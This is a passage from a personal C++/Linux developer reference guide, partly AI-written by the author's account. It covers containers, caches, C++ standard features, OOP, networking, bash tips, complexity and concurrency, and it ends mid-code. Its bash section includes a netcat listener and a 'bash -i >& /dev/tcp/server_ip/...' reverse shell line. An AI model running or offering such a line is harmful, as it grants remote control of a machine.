A Computer Science survival guide for C++/Linux developers
Sat Mar 25 05:03:53 UTC 2023
Let’s start with a haiku written by a computer.
A powerful friend
C++ is here for the long run
Friendly and strong code
This reference is a distillation of 15+ years of online logbook notes into only the essentials that remain relevant to a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevent me from focusing all my attention on the first few chapters.
If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.
The C++ Standard Library containers are a powerful and efficient way to organize and store data for easy retrieval. They provide a consistent interface for accessing and manipulating data, and offer features such as memory management, performance optimization, and scalability that can make development easier and more efficient.
Sequence containers are containers that store elements in a linear fashion, with the elements being laid out in a specific order based on their position within the container. Examples of sequence containers include vectors, deques, and lists.
Associative containers are containers that store elements in an organized fashion, with the elements being laid out in a specific order based on a key associated with each element. Examples of associative containers include maps, sets, and multisets.
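As a small illustrative sketch of the difference: a sequence container keeps elements in the order you put them in, while an associative container orders them by key.

#include <iostream>
#include <map>
#include <vector>

int main() {
  // Sequence container: elements stay in insertion order
  const std::vector<int> seq{3, 1, 2};
  for (const auto x : seq) std::cout << x << ' ';   // 3 1 2
  std::cout << '\n';

  // Associative container: elements are ordered by key
  const std::map<int, char> assoc{{3, 'c'}, {1, 'a'}, {2, 'b'}};
  for (const auto& [k, v] : assoc) std::cout << k << v << ' ';   // 1a 2b 3c
  std::cout << '\n';
}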
Processor caches are small, high-speed memory caches built into a processor to reduce the average time required to access data from the main memory. Caches store frequently used instructions and data so that the processor can access them quickly, reducing latency and allowing the processor to operate more efficiently. Caches are divided into levels, with the fastest and smallest caches located closer to the processor core, and larger and slower caches located further away.
Cache coherence is a mechanism that maintains the consistency of data stored in multiple caches, so that data accessed by one processor is the same as that accessed by another. It ensures that when one processor reads a shared memory location, it will see the most up-to-date value. Cache coherence is an important part of computer architecture that helps to maintain data integrity in a system with multiple processors.
There are three kinds of cache misses: compulsory (the first access to a line), capacity (the working set does not fit in the cache), and conflict (too many addresses map to the same cache set).
Cache misses occur when a processor tries to access data that is not present in the cache. This forces the processor to fetch the data from main memory, resulting in a slower operation and increased latency. Cache misses can be caused by a variety of factors, including insufficient cache size, an inefficient cache design, or an attempt to access data that was evicted from the cache due to memory constraints.
The way virtual functions work – the extra indirection through the vtable and the missed inlining opportunities – may cause issues with caching.
But we may be able to use CRTP (the Curiously Recurring Template Pattern) to avoid the runtime dispatch altogether.
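A minimal sketch of the CRTP idea (the class names are illustrative): the base class calls into the derived class through a template parameter, so the call is resolved at compile time with no vtable indirection.

#include <iostream>

// Static polymorphism via the Curiously Recurring Template Pattern
template <typename Derived>
struct shape {
  double area() const {
    // Resolved at compile time: no virtual dispatch
    return static_cast<const Derived*>(this)->area_impl();
  }
};

struct square : shape<square> {
  double side{2.0};
  double area_impl() const { return side * side; }
};

int main() {
  const square s;
  std::cout << s.area() << '\n';   // 4
}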
Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.
Design to get the most value out of every single cacheline that is read. Split apart the functions and data.
Cache locality is the tendency of a processor to access the same set of data or instructions repeatedly. It refers to the physical proximity of related data and instructions in memory. High cache locality can improve performance by reducing the number of memory accesses required to process a given set of data or instructions, reducing the amount of time spent waiting for memory accesses to complete.
Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.
See wikipedia.
time/program = instructions/program * clockCycles/instruction * time/clockCycles
Amdahl’s law, named after computer scientist Gene Amdahl, is a concept in computer architecture that states that the theoretical speedup of a program using multiple processors in parallel computing is limited by the time needed for the sequential fraction of the program. In other words, the speedup that can be achieved by adding more processors is limited by the portion of the program that cannot be parallelized.
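As a formula (not in the original text, but the standard statement of the law), if P is the fraction of the program that can be parallelised and N is the number of processors:

speedup(N) = 1 / ((1 - P) + P/N)

For example, if 90% of the work can be parallelised (P = 0.9), then even with unlimited processors the speedup can never exceed 1 / 0.1 = 10x.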
It’s very easy to optimise the bits you are familiar with, but it’s not obvious how much your efforts will benefit the overall process: spend your time on the bottlenecks.
Internal Linkage: Internal linkage is a type of linkage that restricts visibility of an object or function to the same translation unit. Objects or functions with internal linkage can only be accessed within the same translation unit. This is done by using the static keyword before the type and name of the object or function.
External Linkage: External linkage is a type of linkage that allows an object or function to be accessed from outside the translation unit in which it is declared. Objects or functions with external linkage can be accessed from any translation unit. This is done by not using the static keyword before the type and name of the object or function.
Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.
http://www.modernescpp.com/index.php/c-20-static-initialization-order-fiasco
If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.
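A minimal two-file sketch of the difference (the file and variable names are illustrative):

// a.cpp
static int counter = 0;   // internal linkage: only visible within this translation unit
int shared_total = 0;     // external linkage: visible to the linker from other translation units

// b.cpp
extern int shared_total;  // refers to the definition in a.cpp
// A "static int counter" here would be a completely separate variable from the one in a.cpp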
Used to declare many things with internal linkage.
namespace {
int a = 0;
int b = 0;
int c = 0;
}
Features of note since C++11.
From the presentation by Marc Gregoire (CppCon 2022).
data[x, y, z] and std::mdspan
consteval – immediate functions: only execute at compile time
uz literals
std::print – not supported in gcc 12.2
import std; – modules
std::flat_map
std::flat_set
<generator>
basic_string::contains()
.contains for strings and containers
<stack_trace>
std::expected
std::byteswap
constexpr for std::optional and std::variant
std::ranges::fold_left
flat_map – contiguous map
import <iostream>; – modules
ranges::to<> – convert a range to a vector (say)
<print> header

A lot of effort has gone into ranges and views in C++23.

starts_with
shift_left
ranges::to – not supported in gcc 12.2
find_if
contains
contains_subrange
fold_left
zip
adjacent
pairwise
chunk
slide
chunk_by
join_with
stride – take every nth element
repeat
iota – infinite views may be more performant as there is no boundary check
contains for maps
starts_with for strings
std::jthread – thread you don’t have to explicitly join (it’s the same as std::thread but joins in the destructor), and also has a built-in stop token
std::barrier for thread synchronisation (like std::latch but reusable)
std::filesystem – from Boost
std::string_view
std::clamp
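A hedged sketch combining a few of the ranges features listed above (assumes a very recent C++23 compiler and standard library; the numbers are illustrative):

#include <print>
#include <ranges>
#include <vector>

int main() {
  const std::vector v{1, 2, 3, 4, 5, 6};

  // Take every other element, square it, and collect into a new vector with ranges::to
  const auto squares = v
    | std::views::stride(2)
    | std::views::transform([](int x) { return x * x; })
    | std::ranges::to<std::vector>();

  for (const auto x : squares)
    std::print("{} ", x);   // 1 9 25
}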
C++14 is an extension and improvement of C++11.
0b1111000
auto return type
auto in lambda parameters
template <class T> constexpr T bins = T{24'576};
decltype(auto)
constexpr (catching UB)

See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.
Code (text) segment: This segment contains the actual machine code instructions of the program.
Data segment: This segment contains initialized global and static variables.
BSS segment: This segment contains uninitialized (zero-initialized) global and static variables.
Read-only data segment: This segment contains the program’s string literals and other constants.
Heap segment: This segment is used for dynamic memory allocation during the run-time of the program.
Stack segment: This segment stores local variables and function call frames. It is also used for parameter passing between functions.
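A minimal sketch of where things typically end up (the section names are the common ELF ones; exact placement is toolchain-dependent):

#include <iostream>

int initialised = 42;          // data segment (.data)
int uninitialised;             // BSS (.bss), zero-initialised
const char* greeting = "hi";   // the literal "hi" typically lives in read-only data (.rodata)

int main() {                   // machine code lives in the text/code segment
  int local = 7;               // stack
  int* dynamic = new int{3};   // heap
  std::cout << initialised << ' ' << uninitialised << ' ' << local << ' '
            << *dynamic << ' ' << greeting << '\n';
  delete dynamic;
}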
This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.
std::move
&& modifier indicates the parameter is an object that we intend to move from instead of copying
Declare move constructors and move assignment noexcept (the compiler-generated ones are anyway); containers such as std::vector will only move, rather than copy, their elements during reallocation if the move constructor is noexcept
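A minimal sketch (the type and function names are illustrative) of a function taking an rvalue reference and a caller handing over ownership with std::move:

#include <iostream>
#include <string>
#include <utility>
#include <vector>

// The && modifier says we intend to move from the argument rather than copy it
void consume(std::vector<std::string>&& v) {
  const std::vector<std::string> local = std::move(v);   // take ownership
  std::cout << local.size() << " elements consumed\n";
}

int main() {
  std::vector<std::string> words{"a", "b", "c"};
  consume(std::move(words));   // words is left in a valid but unspecified state
}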
A test is not a unit test if:
See the complete article.
In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.
1 000 kilo | milli .001
1 000 000 mega | micro .000 001
1 000 000 000 giga | nano .000 000 001
1 000 000 000 000 tera | pico .000 000 000 001
1 000 000 000 000 000 peta | femto .000 000 000 000 001
1 000 000 000 000 000 000 exa | atto .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001
See list of SI prefixes.
You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc. – but most people won’t know what you’re talking about. Also, manufacturers tend to use powers of 1000 rather than powers of 1024 (e.g., 10^9 rather than 2^30 bytes for a gigabyte) because it makes their capacities look bigger.
See why is everyone in such a rush?
1/1000000000 second == 1 nanosecond
Approximate durations of typical operations (rounded to help remember.)
Action | Duration (nanoseconds) |
---|---|
L1 cache read / variable increment | <1 |
Branch misprediction | 5 |
L2 cache read / std::atomic increment | 10 |
Mutex lock/unlock / std::scoped_lock | 20 |
Fetch from main memory | 100 |
Send 2KiB over 1Gbps network | 20,000 |
Create a std::thread | 20,000 |
Send packet from US to Europe and back | 200,000,000 |
Object-oriented programming (OOP) is a programming language model organized around objects rather than "actions" and data rather than logic. It attempts to simulate the real world by creating objects that contain data and code to manipulate that data. OOP languages allow developers to create objects that can be reused in different programs. This modularity allows for more efficient development and maintenance of programs. OOP emphasizes the concept of inheritance, which allows objects to acquire the properties and behaviours of the objects from which they are derived. This allows for code reuse and reduces the need for rewriting code. OOP also encourages the use of abstraction, which reduces the amount of code needed to solve a problem. In addition, OOP facilitates the use of polymorphism, which allows the same code to be used for different types of objects.
Polymorphism refers to the ability for different types of data to be treated the same way. There are two main types of polymorphism:
Ad-hoc polymorphism: a function or operator behaves differently for different argument types, with a separate implementation provided for each supported type. Function and operator overloading in languages such as Java and C++ are examples.
Parametric polymorphism: a single implementation is written generically in terms of one or more type parameters and works uniformly for whatever type is supplied. Templates in C++ and generics in languages such as Haskell and ML are examples.
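A small sketch of both in C++ (the function names are illustrative): overloading as ad-hoc polymorphism, and a function template as parametric polymorphism.

#include <iostream>
#include <string>

// Ad-hoc polymorphism: a separate overload per supported type
void print(int x) { std::cout << "int: " << x << '\n'; }
void print(const std::string& x) { std::cout << "string: " << x << '\n'; }

// Parametric polymorphism: one definition parameterised over the type
template <typename T>
T twice(const T& x) { return x + x; }

int main() {
  print(42);
  print(std::string{"hello"});
  std::cout << twice(21) << ' ' << twice(std::string{"ab"}) << '\n';   // 42 abab
}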
A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.
Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if the object is deleted via a pointer to the polymorphic base class.
The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).
In derived classes, you should mark overridden methods as
override
to express intention and also protect from the
base class being changed unwittingly.
A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address.)
A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each virtual-class.
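You can check these claims at compile time with the type traits header; a sketch (the sizeof assertions are assumptions about a typical 64-bit ABI, so they are implementation-defined rather than guaranteed):

#include <type_traits>

struct plain { };                              // no virtual functions
struct base { virtual ~base() = default; };    // polymorphic

static_assert(sizeof(plain) == 1);             // objects can’t have zero size
static_assert(sizeof(base) == 8);              // hidden vtable pointer on a typical 64-bit platform
static_assert(!std::has_virtual_destructor_v<plain>);
static_assert(std::has_virtual_destructor_v<base>);

int main() {}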
RAII (Resource Acquisition Is Initialization) is a technique used in object-oriented programming to ensure that resources are properly allocated, released, and managed. It is achieved by tying the lifetime of the resource to the lifetime of an object. When the object is created, its resources are acquired, and when the object is destroyed, the resources are released. This ensures that resources are always released in a timely manner and helps prevent memory leaks and other resource-related issues.
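A minimal sketch of the idea using a file handle (the class name is illustrative): the resource is acquired in the constructor and released in the destructor, so its lifetime is tied to the object’s scope.

#include <cstdio>
#include <stdexcept>

class file {
  std::FILE* handle_;
public:
  explicit file(const char* path) : handle_{std::fopen(path, "w")} {
    if (!handle_) throw std::runtime_error{"failed to open file"};
  }
  ~file() { std::fclose(handle_); }    // resource released when the object dies
  file(const file&) = delete;          // non-copyable: one owner per resource
  file& operator=(const file&) = delete;
  void write(const char* text) { std::fputs(text, handle_); }
};

int main() {
  file f{"example.txt"};
  f.write("RAII ties the file's lifetime to f's scope\n");
}   // f goes out of scope here and the file is closed automatically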
For simple readonly types, pass by const value.
void func(const int p) {
}
For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider if the type is trivially copyable: requiring a shallow or deep copy.
void func(const big_type& p) {
}
If the first thing you do is make a copy, pass by non-const value.
void func(int p) {
}
If you want to modify the caller’s copy, pass by non-const reference.
void func(int& p) {
}
The only difference between a class and a struct is the default access level: public, protected, private.
But typically a struct is used for “plain old data” or memory-mapped data where you want the members to be laid out in a predictable way (virtuals/inheritance add the complication of a vtable pointer.)
Either way, you can test your assertions at compile time with
static_assert
and the type
traits header.
struct A {
// public: <-- default for structs
int x_;
};
If the data are constrained by an invariant – i.e., not all values are valid – use a class.
class B {
private: // <-- default for classes
int x_; // must be between 0-1000
};
See OSI on Wikipedia.
Layer | Function |
---|---|
Layer 7 | Application |
Layer 6 | Presentation |
Layer 5 | Session |
Layer 4 | Transport |
Layer 3 | Network |
Layer 2 | Data Link |
Layer 1 | Physical |
The TCP three-way handshake is a process that is used in a TCP/IP network to establish a connection between a local host/client and a remote host/server. It is a three-step process that requires both the client and server to exchange SYN and ACK (acknowledgement) packets before actual data communication begins.
The client sends a SYN packet to the server, requesting to open a connection.
The server responds with a SYN-ACK packet, acknowledging the request and confirming that the connection can be opened.
The client responds with an ACK packet, acknowledging the server’s SYN-ACK packet and confirming that the connection is established.
Once this three-way handshake is complete, the client and server can communicate and exchange data.
SYN stands for “synchronise”.
=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= FIN-ACK
=> ACK
constexpr – find undefined behaviour at compile time

Template metaprogramming (TMP) is a technique used in C++ programming that utilizes template classes and functions to generate code at compile-time, as opposed to run-time. TMP is often used to improve the performance of code by removing the need for dynamic memory allocation and reducing the amount of code that needs to be written. It is also used to write generic code that can be used with any type of data structure or object. TMP can be used to solve complex problems that would otherwise be difficult to code. Examples of TMP include type traits, compile-time assertions, and recursive templates.
Templates are an important part of the C++ Standard Library, as they provide a way to create generic, type-independent algorithms and data structures. Templates allow developers to write code that can be reused with any type of data, without needing to rewrite the code for each specific data type. This reduces the amount of time and effort required to develop a program, as well as making it much easier to maintain and debug. Templates are used in the C++ Standard Library to define classes, such as containers and iterators, as well as algorithms, such as sorting and searching.
SFINAE (Substitution Failure Is Not An Error) is a C++ concept that allows for the substitution of non-matching function templates without causing a compiler error. It works by ignoring any substitution that would cause a compiler error and then substituting the next viable template. This allows for more flexible template programming, as it allows for different templates to be used in different scenarios.
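A minimal sketch of SFINAE in action (the function names are illustrative): overload resolution silently discards the template whose substitution fails and picks the next viable one.

#include <iostream>
#include <type_traits>

// Chosen for integral types; substitution fails (and is not an error) otherwise
template <typename T, std::enable_if_t<std::is_integral_v<T>, int> = 0>
void describe(T) { std::cout << "integral\n"; }

// Chosen for floating-point types
template <typename T, std::enable_if_t<std::is_floating_point_v<T>, int> = 0>
void describe(T) { std::cout << "floating point\n"; }

int main() {
  describe(42);     // integral
  describe(3.14);   // floating point
}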
As a Linux developer you need a strong command line game.
bash
is ubiquitous, and a powerful language in itself,
without resorting to something like Python.
git
is awesome on the command line and pretty much
essential. Use it to manage your chores.
See how to undo almost anything with git.
(echo hello; sleep 1) | telnet 127.0.0.1 80
echo hello > /dev/tcp/127.0.0.1/80
echo hello | nc localhost 80
# server
nc -knvlp 3389
# client
bash -i >& /dev/tcp/server_ip/3389 0>&1
git add !(unit.md)
shuf -n 1 readme.txt
From bash 5.
echo $EPOCHREALTIME
1614870873.574544
echo $EPOCHSECONDS
1614870876
The three load average values are 1, 5 and 15 minutes.
uptime
15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51
Stress your system in different ways.
stress --cpu 8
echo $(nproc)
localhost
127.0.0.1
127.0.0.2
127.0.0.3
127.1
0.0.0.0
0 # wut
mv {,_}.bash_history
watch -d ip a
pushd equivalent

I use this all the time. Rather than pushd and popd to navigate around the file system:
# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post
# Return whence you came
cd -
You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet
Complexity | Definition |
---|---|
Constant | O(1) |
Logarithmic | O(log n) |
Linear | O(n) |
Linearithmic | O(n log n) |
Quadratic | O(n^2) |
Cubic | O(n^3) |
Exponential | O(2^n) |
Linked lists and arrays have different complexities depending on the operation being performed. Generally speaking, accessing an element of a linked list is O(n) while indexing into an array is O(1). This means linked lists tend to be slower than arrays for random access, but they offer more flexibility and are better suited for dynamic data structures.
Multi-threaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.
tl;dr “A computer program or subroutine is called reentrant if multiple invocations can safely run concurrently on a single processor system.”
Reentrancy is a property of code that can be safely interrupted part-way through and invoked again (“re-entered”) before the earlier invocation has completed, for example via recursion, an interrupt, or a signal handler. Reentrant code avoids relying on shared mutable state such as static or global variables, which also makes it easier to reason about and reuse.
tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”
A race condition in computer science is a situation or sequence of events where the output of a program or system is dependent on the timing or order of other events. This can occur when multiple threads or processes access shared resources in a shared environment without proper synchronization. In this case, the order in which the threads or processes run can affect the outcome of the program. If one thread runs before another, it can take ownership of the shared resource, causing the second thread to fail or return an incorrect result. Race conditions can cause unpredictable results or even system crashes.
Deadlocks and livelocks are both types of system resource contention that can occur in computer systems.
Deadlocks occur when two or more processes are waiting for the same resources and neither can continue until those resources are released by the other process. This creates an impasse where neither process can make any progress.
Livelocks, on the other hand, are situations where two or more processes are constantly trying to acquire the same resources, but none of them ever actually succeeds. This can lead to an infinite loop of attempts, with none of the processes ever making any progress.
Run your code on different numbers of CPUs. It’s interesting how the bottlenecks move around depending on the available resources; and it’s really easy to write software that doesn’t run on one core.
Make sure that all transactions are short and efficient.
Ensure that all transactions acquire locks in the same order.
Use timeouts to avoid waiting for a resource that is locked by another transaction.
Avoid using nested transactions.
Use a deadlock detection and resolution mechanism to detect and resolve deadlocks.
Minimize the number of locks per transaction.
Use a read-committed isolation level.
Monitor and analyze deadlock logs.
std::scoped_lock can acquire multiple mutexes in a single call using a deadlock-avoidance algorithm, and releases them when it goes out of scope.
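A minimal sketch of locking two mutexes without risking a lock-order deadlock (the variable names are illustrative):

#include <mutex>
#include <thread>

std::mutex m1, m2;
int shared_a = 0, shared_b = 0;

void transfer() {
  // Locks both mutexes with a deadlock-avoidance algorithm,
  // and releases them when the scope ends (RAII)
  const std::scoped_lock lock{m1, m2};
  ++shared_a;
  --shared_b;
}

int main() {
  std::thread t1{transfer}, t2{transfer};
  t1.join();
  t2.join();
}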
A mutex is a synchronization primitive that allows only one thread to access a resource at a time. It is used to protect shared resources from concurrent access. A semaphore is a synchronization primitive that allows up to a fixed number of threads (or processes) to access a resource at a time. A mutex is typically used to provide exclusive access to a resource, while a semaphore is used to control access to a resource by multiple processes.
tl;dr A thread is a branch of execution. A process can consist of multiple threads.
Threads are a subset of processes. A process is a program in execution, while a thread is a single flow of control within the process. A process can contain multiple threads, which share the same address space and can communicate with each other. Threads have less overhead than processes, and so they can be used to improve the performance of an application.
A hash function is a mathematical algorithm that takes an input of any size and produces an output of a fixed size. It is used to provide a digital fingerprint of a piece of data and is typically used in cryptography and data security applications.
Design patterns are reusable solutions to commonly occurring problems in software design. The objective of design patterns is to provide developers with a reliable, easy-to-understand set of instructions for tackling a particular problem. They also provide a common language for developers to communicate about problems and solutions. Design patterns can help developers create more flexible, maintainable, and scalable code.
The Factory Design Pattern is a software design pattern that is used to create objects or products. This pattern provides a way to create objects without exposing the creation logic to the client and refers to the newly created object using a common interface. It is one of the most commonly used creational patterns due to its simplicity.
The Factory Design Pattern consists of four components: a product interface, a concrete product, a factory interface, and a concrete factory. The product interface defines the interface of the product object and any methods or properties that the object must have. The concrete product is an implementation of the product interface. The factory interface defines the interface of the factory object and any methods or properties that the factory must have. The concrete factory is an implementation of the factory interface that is responsible for creating the product object.
The Factory Design Pattern can be used in scenarios where the type of object to be created is not known until runtime. It also enables the client to create objects without having to specify the exact type of object to be created. This pattern also allows the client to create a single instance of an object and use it throughout the application.
The Factory Design Pattern is a useful tool to keep code organized, flexible, and extensible. It also provides a way to create objects in an easily testable manner. This pattern encourages code reuse and makes it easier to maintain code by isolating the creation process from the rest of the application.
Store a system configuration in an external text file and construct at runtime using the factory pattern.
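A minimal sketch of the pattern (the shape hierarchy and the string keys are illustrative), which could be driven by a configuration file read at runtime as suggested above:

#include <iostream>
#include <memory>
#include <string>

// Product interface
struct shape {
  virtual ~shape() = default;
  virtual void draw() const = 0;
};

// Concrete products
struct circle : shape { void draw() const override { std::cout << "circle\n"; } };
struct square : shape { void draw() const override { std::cout << "square\n"; } };

// Factory: the client never names the concrete type
std::unique_ptr<shape> make_shape(const std::string& name) {
  if (name == "circle") return std::make_unique<circle>();
  if (name == "square") return std::make_unique<square>();
  return nullptr;
}

int main() {
  // In practice the string might come from an external configuration file
  const auto s = make_shape("circle");
  if (s) s->draw();
}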
The Visitor Design Pattern is a behavioral software design pattern that allows for the separation of an algorithm from an object structure on which it operates. It is one way to follow the open/closed principle. This pattern allows for a new operation to be added to a set of classes without having to modify any of the existing classes. It is often used when an object structure contains many objects of different types, and you need to perform an operation on all of them. The Visitor Pattern defines a new operation to a class without changing the class. Instead, a visitor class is created that takes the object reference as input, and then implements the operation. This makes it possible to add new operations to existing object structures without changing the objects themselves.
The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”
Double dispatch in subtype polymorphism is a technique where two objects of different types are used to determine the behavior of a method. This technique occurs when a method call is made on an object and the method is dispatched based on both the type of the method and the type of the object being called. This allows for different behavior to be executed depending on the types of the objects being used. Double dispatch is an interesting technique as it enables an object to respond differently to a method call depending on the type of the object it is called on.
Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.
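A minimal sketch of that exercise (the class names are illustrative): each shape accepts a visitor, and the second virtual call dispatches on the visitor type, giving double dispatch.

#include <iostream>

struct circle;
struct square;

// Visitor interface: one overload per concrete shape
struct visitor {
  virtual ~visitor() = default;
  virtual void visit(const circle&) = 0;
  virtual void visit(const square&) = 0;
};

struct shape {
  virtual ~shape() = default;
  virtual void accept(visitor&) const = 0;
};

// First dispatch: on the shape's dynamic type
struct circle : shape { void accept(visitor& v) const override { v.visit(*this); } };
struct square : shape { void accept(visitor& v) const override { v.visit(*this); } };

// Second dispatch: on the visitor's dynamic type
struct area_printer : visitor {
  void visit(const circle&) override { std::cout << "area of a circle\n"; }
  void visit(const square&) override { std::cout << "area of a square\n"; }
};

int main() {
  const circle c;
  const square s;
  area_printer p;
  c.accept(p);
  s.accept(p);
}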
Hardware interface classes will typically be a const
register map which is a flyweight pattern. This is also an example of a
singleton pattern as it’s only initialised once regardless of how many
instances are created. Additionally if registers are actually wired to
discrete lines they might be read-only, so the memento pattern is used
to store the internal state.
“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”
See Wikipedia.
Dependency inversion is a software design principle that states that high-level modules (e.g. business logic) should not depend on low-level modules (e.g. database access), but rather be decoupled from them. This helps to reduce the complexity of the software architecture and make it more extensible.
Less common but another set of principles to consider.
It’s important to know the common data structures and their characteristics.
std::vector
std::vector
is the go-to container, so let’s give it
some special attention. It has contiguous storage – therefore cache
friendly – and uses the RAII
paradigm: the data are created on the heap and the allocation and
deallocation (new/delete) are handled for you. Interestingly,
std::string
exhibits many of the same characteristics, but
it’s not quite containery enough to qualify.
Estimate how many times the fax
destructor is called
below.
#include <iostream>
#include <vector>

auto x = 0uz;

int main() {
  struct fax {
    // Default constructor and destructor
    fax() { std::cout << x << " ctor\n"; }
    ~fax() { std::cout << "\t" << x << " dtor\n"; }

    // Copy and move constructors
    fax(const fax&) { std::cout << x << " copy ctor\n"; };
    fax(fax&&) { std::cout << x << " move ctor\n"; };

    // Copy and move assignment operators
    fax& operator=(const fax&) {
      std::cout << x << " copy assignment ctor\n";
      return *this;
    }
    fax& operator=(fax&&) {
      std::cout << x << " move assignment ctor\n";
      return *this;
    };

    const size_t id = x++;
  };

  std::vector<fax> y;

  // Reduce copies by allocating up front
  // y.reserve(3);

  for (size_t i = 0; i < 3; ++i) {
    y.push_back(fax{});
    std::cout << "-- capacity " << y.capacity() << " --\n";
  }

  // fax f1 = fax{};
  // fax f2 = std::move(fax{});
}
See the program output (below), note how the capacity is growing exponentially (doubling each time).
1 ctor
2 move ctor
2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
5 dtor
5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
9 dtor
9 dtor
9 dtor
-- capacity 4 --
9 dtor
9 dtor
9 dtor
For each push we call the default constructor to create a temporary object and then call the move constructor to populate the new element with its data… so far so good. But crucially, when the vector is resized we must also copy all the existing elements into the new storage (they are copied rather than moved here because the move constructor is not declared noexcept). Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead. Additionally, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.
std::set
and std::map
are implemented using
a red-black tree, a type of balanced binary search tree. C++23
introduces std::flat_map
which is implemented using
contiguous storage to make it more cache-friendly.
Binary search trees (BST) are a type of data structure that organises its elements in a tree-like structure with the following properties: the left subtree of a node contains only keys less than the node’s key, the right subtree contains only keys greater than it, and both subtrees are themselves binary search trees.
Binary search trees are used to store and quickly retrieve data. They are commonly used for dictionary and symbol table implementations.
A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the left most node is the smallest, and the right most node is the largest.
Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.
e| /e
d| d
c| / \c
b| b
a| / \ /a
9|----- / 9
8| / \8
7| 7
6| \ /6
5|----- \ 5
4| \ / \4
3| 3
2| \ /2
1| 1
0| \0
Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything hashes to the same bin, then it is O(n). Additionally, if the proportion of occupied slots – known as the “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.
std::unordered_set
and std::unordered_map
are implemented using hash tables.
A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.
Support of random access iterators is required to keep a heap structure internally at all times. A sorted list is also a min heap (though a min heap is not necessarily sorted).
123456789abcdef
1
23
4567
89abcdef
Project down: the top of the tree is the smallest element.
1
2 3
4 5 6 7
8 9 a b c d e f
1
/ \
/ \
/ \
2 3
/ \ / \
4 5 6 7
/ \ / \ / \ / \
8 9 a b c d e f
A heap is a data structure that is typically used to implement a priority queue, where elements are organized in a tree-like structure with the highest priority element at the top. A binary search tree is a data structure used to store sorted data in which each node contains a value and two pointers, one pointing to a subtree with values less than the current node and one pointing to a subtree with values greater than the current node. A binary heap is a complete tree and therefore balanced by construction, while a binary search tree must be explicitly kept balanced in order to maintain a logarithmic search time.
Adding/removing at the beginning is O(1), but adding at the end means traversing the whole list, therefore O(n). Searching is also O(n).
std::forward_list
is a singly linked list.
Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).
std::list
is a doubly linked list.
Container | Insert | Delete | Access | Search |
---|---|---|---|---|
vector | O(1)* | O(n) | O(1) | O(n) |
deque | O(1) | O(n) | O(1) | O(n) |
list | O(1) | O(1) | O(n) | O(n) |
set | O(log n) | O(log n) | O(log n) | O(log n) |
map | O(log n) | O(log n) | O(log n) | O(log n) |
unordered_set | O(1) | O(1) | O(1) | O(1) |
unordered_map | O(1) | O(1) | O(1) | O(1) |
*O(1) amortized constant time when inserting at the end
However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything.
This is all a lot easier since std::thread was introduced in C++11. Now we have a platform-independent interface.
See the C++ concurrency support library examples.
However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick then could it actually take longer to parallelise it? You need to profile: how long does it take to just create a thread?
std::async
Think of it like pushing a calculation into the background.
std::async
executes a function asynchronously and returns a
std::future
that will eventually hold the result of that
function call. Quite a nice way to reference the result of calculation
executed in another thread.
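A minimal sketch of pushing a calculation into the background (the workload is illustrative):

#include <future>
#include <iostream>
#include <numeric>
#include <vector>

int main() {
  const std::vector<int> v(1'000'000, 1);

  // Start the summation in another thread (with the async launch policy)
  auto result = std::async(std::launch::async, [&v] {
    return std::accumulate(v.cbegin(), v.cend(), 0);
  });

  // Do other work here, then block on the future when the value is needed
  std::cout << result.get() << '\n';
}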
std::thread
You need to call join()
for every thread created with
std::thread
. Typically it’s done by storing your threads as
a vector and joining each of them in a loop.
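A minimal sketch of that pattern (the thread count and workload are illustrative):

#include <iostream>
#include <thread>
#include <vector>

int main() {
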